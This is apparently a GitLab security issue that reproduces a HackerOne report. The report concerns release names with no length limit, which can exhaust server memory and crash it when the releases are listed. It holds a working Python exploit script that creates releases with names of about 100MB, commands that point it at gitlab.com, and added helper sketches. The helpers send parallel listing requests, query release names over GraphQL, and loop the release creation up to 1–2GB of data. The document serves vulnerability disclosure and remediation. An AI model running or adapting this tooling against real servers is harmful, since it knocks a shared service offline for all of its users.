
Release names are unbounded, leads to server crash

⚠️ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #3015894 by pwnie on 2025-02-26, assigned to @ottilia_westerlund:


Report

Summary

We discovered that GitLab's Releases API does not enforce a limit on the length of the release name. An attacker can create releases with excessively large names (e.g., 100MB each); when these are aggregated by the listing API, GraphQL queries, or controllers, the resulting payloads can reach 1GB–2GB. This can exhaust server memory and CPU, ultimately leading to a denial of service.

Steps to Reproduce

  1. Prepare the Exploit Script:
    Use the following Python script to create releases with huge names:

    #!/usr/bin/env python3
    import argparse
    import json
    import sys
    from datetime import datetime
    import requests
    import os
    import base64

    def parse_args():
        parser = argparse.ArgumentParser(
            description="Create a GitLab release via the API using configurable command-line arguments."
        )
        parser.add_argument("--host", required=True, help="GitLab host URL (e.g., https://gitlab.com)")
        parser.add_argument("--token", required=True, help="Private token for authentication")
        parser.add_argument("--project", required=True, help="Project ID or URL-encoded path")
        parser.add_argument("--tag-name", required=True, help="The Git tag for the release")
        parser.add_argument("--tag-message", help="Optional tag message for creating an annotated tag")
        parser.add_argument("--description", help="Release description (Markdown supported)")
        parser.add_argument("--ref", help="Ref (commit SHA, branch, or tag) to create the release from if tag does not exist")
        parser.add_argument("--assets", help=("Assets JSON string. Example: '{\"links\": [{\"name\": \"My Asset\", \"url\": \"https://example.com/asset\"}]}'"))
        parser.add_argument("--milestones", help="Comma-separated list of milestone titles")
        parser.add_argument("--milestone-ids", help="Comma-separated list of milestone IDs (cannot be combined with milestones)")
        parser.add_argument("--released-at", help="Release datetime in ISO 8601 format (e.g., 2021-01-01T00:00:00Z)")
        parser.add_argument("--legacy-catalog-publish", action="store_true", help="If set, the release will be published to the CI catalog")
        parser.add_argument("--mb-size", type=int, default=10, help="Size in MB for the base64 encoded release name")
        return parser.parse_args()

    def generate_release_name(mb_size):
        # Calculate number of raw bytes needed so that base64 encoding yields mb_size MB.
        raw_length = mb_size * 1024 * 1024 * 3 // 4
        random_bytes = os.urandom(raw_length)
        b64_data = base64.b64encode(random_bytes).decode('utf-8')
        # Keep only alphanumeric characters
        filtered = ''.join(c for c in b64_data if c.isalnum())
        return filtered

    def main():
        args = parse_args()

        url = f"{args.host.rstrip('/')}/api/v4/projects/{args.project}/releases"
        headers = {
            "Content-Type": "application/json",
            "PRIVATE-TOKEN": args.token
        }
        data = {"tag_name": args.tag_name}

        if args.tag_message:
            data["tag_message"] = args.tag_message
        # Generate release name with adjustable size.
        data["name"] = generate_release_name(args.mb_size)
        if args.description:
            data["description"] = args.description
        if args.ref:
            data["ref"] = args.ref
        if args.assets:
            try:
                data["assets"] = json.loads(args.assets)
            except json.JSONDecodeError as e:
                print("Invalid JSON for assets:", e)
                sys.exit(1)
        if args.milestones:
            data["milestones"] = [m.strip() for m in args.milestones.split(",")]
        if args.milestone_ids:
            milestone_ids = []
            for m in args.milestone_ids.split(","):
                m = m.strip()
                try:
                    milestone_ids.append(int(m))
                except ValueError:
                    milestone_ids.append(m)
            data["milestone_ids"] = milestone_ids
        if args.released_at:
            try:
                datetime.fromisoformat(args.released_at.replace("Z", "+00:00"))
                data["released_at"] = args.released_at
            except ValueError:
                print("Invalid datetime format for released_at. Expected ISO 8601 format.")
                sys.exit(1)
        if args.legacy_catalog_publish:
            data["legacy_catalog_publish"] = True

        response = requests.post(url, headers=headers, json=data)
        if response.ok:
            print("Release created successfully:")
            print(json.dumps(response.json(), indent=2))
        else:
            print("Failed to create release:")
            print(f"Status code: {response.status_code}")
            try:
                print(json.dumps(response.json(), indent=2))
            except Exception:
                print(response.text)

    if __name__ == "__main__":
        main()
  2. Generate a Large Release Name:
    Create a release with a 100MB name by running:

    ./create_release.py --host https://gitlab.com --token <PRIVATE_TOKEN> --project <PROJECT_ID> --tag-name v1.0.0 --mb-size 100 --description "Release with large name"  
  3. Repeat the Process:
    Create enough releases (each with a 100MB name) so that the cumulative size of release names is between 1GB and 2GB.

  4. Trigger the Vulnerability:
    Fetch the release listings using GitLab’s listing API, GraphQL query, or through the controllers. The aggregated payload containing the massive release names will consume excessive resources. Sending these requests in parallel can overwhelm the server, potentially causing a crash.
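
The trigger phase in step 4 can be sketched as a small standard-library helper. This is a minimal sketch, not part of the original exploit: the host, token, and project values are placeholders, and the worker and page counts are illustrative assumptions.

```python
# Hypothetical sketch of step 4: request the release listing many times in
# parallel so the server must repeatedly serialize the oversized names.
# HOST, TOKEN, and PROJECT values passed to hammer() are placeholders.
import concurrent.futures
import urllib.request

def listing_url(host, project):
    # Releases listing endpoint (API v4); {page} is filled in per request.
    return f"{host.rstrip('/')}/api/v4/projects/{project}/releases?per_page=100&page={{page}}"

def fetch_page(host, token, project, page):
    # One listing request; returns the page number, HTTP status, and body size.
    req = urllib.request.Request(
        listing_url(host, project).format(page=page),
        headers={"PRIVATE-TOKEN": token},
    )
    with urllib.request.urlopen(req, timeout=300) as resp:
        body = resp.read()
    return page, resp.status, len(body)

def hammer(host, token, project, workers=20, pages=20):
    # Fire `pages` listing requests across `workers` threads in parallel.
    with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as pool:
        futures = [pool.submit(fetch_page, host, token, project, p)
                   for p in range(1, pages + 1)]
        for f in concurrent.futures.as_completed(futures):
            page, status, size = f.result()
            print(f"page={page} status={status} bytes={size}")

# hammer("https://gitlab.example.com", "<PRIVATE_TOKEN>", "<PROJECT_ID>")
```

Each response body carries every oversized release name on that page, so body sizes in the hundreds of megabytes per request are the signal that the amplification is working.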

Impact

  • Denial of Service (DoS): The unbounded release name field allows an attacker to store enormous amounts of data, which, when queried, can consume excessive server memory and CPU.
  • Service Disruption: Parallel requests on listings with these oversized releases can crash the server, disrupting service for all users.
  • Resource Exhaustion: The attack leverages the API's lack of constraints, leading to potential long-term availability issues and performance degradation.

Components Affected

  • Releases API Endpoint: The API that creates and stores release information.
  • Listing API & Controllers: Endpoints responsible for fetching and rendering release data.
  • GraphQL Query Endpoints: GraphQL interfaces that expose release information without enforcing data size limits.
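
As an illustration of the GraphQL surface, a query of roughly this shape pulls every release name back in a single response. The field names follow GitLab's public GraphQL schema, but treat the exact shape as an assumption; the host, token, and project path are placeholders.

```python
# Hypothetical sketch: fetch release names through POST /api/graphql.
# The query shape is an assumption based on GitLab's public schema.
import json
import urllib.request

QUERY = """
query($fullPath: ID!) {
  project(fullPath: $fullPath) {
    releases(first: 100) {
      nodes { name }
    }
  }
}
"""

def graphql_payload(full_path):
    # JSON body for the GraphQL endpoint.
    return json.dumps({"query": QUERY, "variables": {"fullPath": full_path}})

def fetch_release_names(host, token, full_path):
    req = urllib.request.Request(
        f"{host.rstrip('/')}/api/graphql",
        data=graphql_payload(full_path).encode("utf-8"),
        headers={
            "Content-Type": "application/json",
            "Authorization": f"Bearer {token}",
        },
    )
    with urllib.request.urlopen(req, timeout=300) as resp:
        return json.load(resp)

# fetch_release_names("https://gitlab.example.com", "<PRIVATE_TOKEN>", "group/project")
```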

Usage Examples

  • Creating a Standard Release with a Huge Name (e.g., 100MB):

    ./create_release.py --host https://gitlab.com --token <PRIVATE_TOKEN> --project <PROJECT_ID> --tag-name v1.0.0 --mb-size 100 --description "Release with 100MB name"  
  • Creating Multiple Releases for Aggregated Payload Testing:

    Repeat the above command with different tag names (e.g., v1.0.1, v1.0.2, etc.) until the cumulative size of release names is sufficiently large (totaling 1GB–2GB).

  • Triggering the Listing Endpoint:

    After creating enough releases, invoke the listing API or a GraphQL query endpoint (possibly in parallel) to fetch the release data, which will process the massive payload and potentially crash the server.
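
The repetition in the second example can be driven by a small wrapper. This sketch assumes the create_release.py script from step 1 is saved in the working directory; the target of ~1.5GB and 100MB per release are illustrative values from the report.

```python
# Hypothetical driver: invoke create_release.py repeatedly with sequential
# tag names until the aggregate release-name payload reaches a target size.
import subprocess

def tags_needed(target_mb, mb_per_release):
    # Ceiling division: number of releases required to reach target_mb.
    return -(-target_mb // mb_per_release)

def create_releases(host, token, project, target_mb=1536, mb_per_release=100):
    # ~1.5GB of aggregate name data at 100MB per release -> 16 invocations.
    for i in range(tags_needed(target_mb, mb_per_release)):
        subprocess.run(
            ["./create_release.py", "--host", host, "--token", token,
             "--project", project, "--tag-name", f"v1.0.{i}",
             "--mb-size", str(mb_per_release)],
            check=True,
        )

# create_releases("https://gitlab.example.com", "<PRIVATE_TOKEN>", "<PROJECT_ID>")
```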

How To Reproduce

Please add reproducibility information to this section: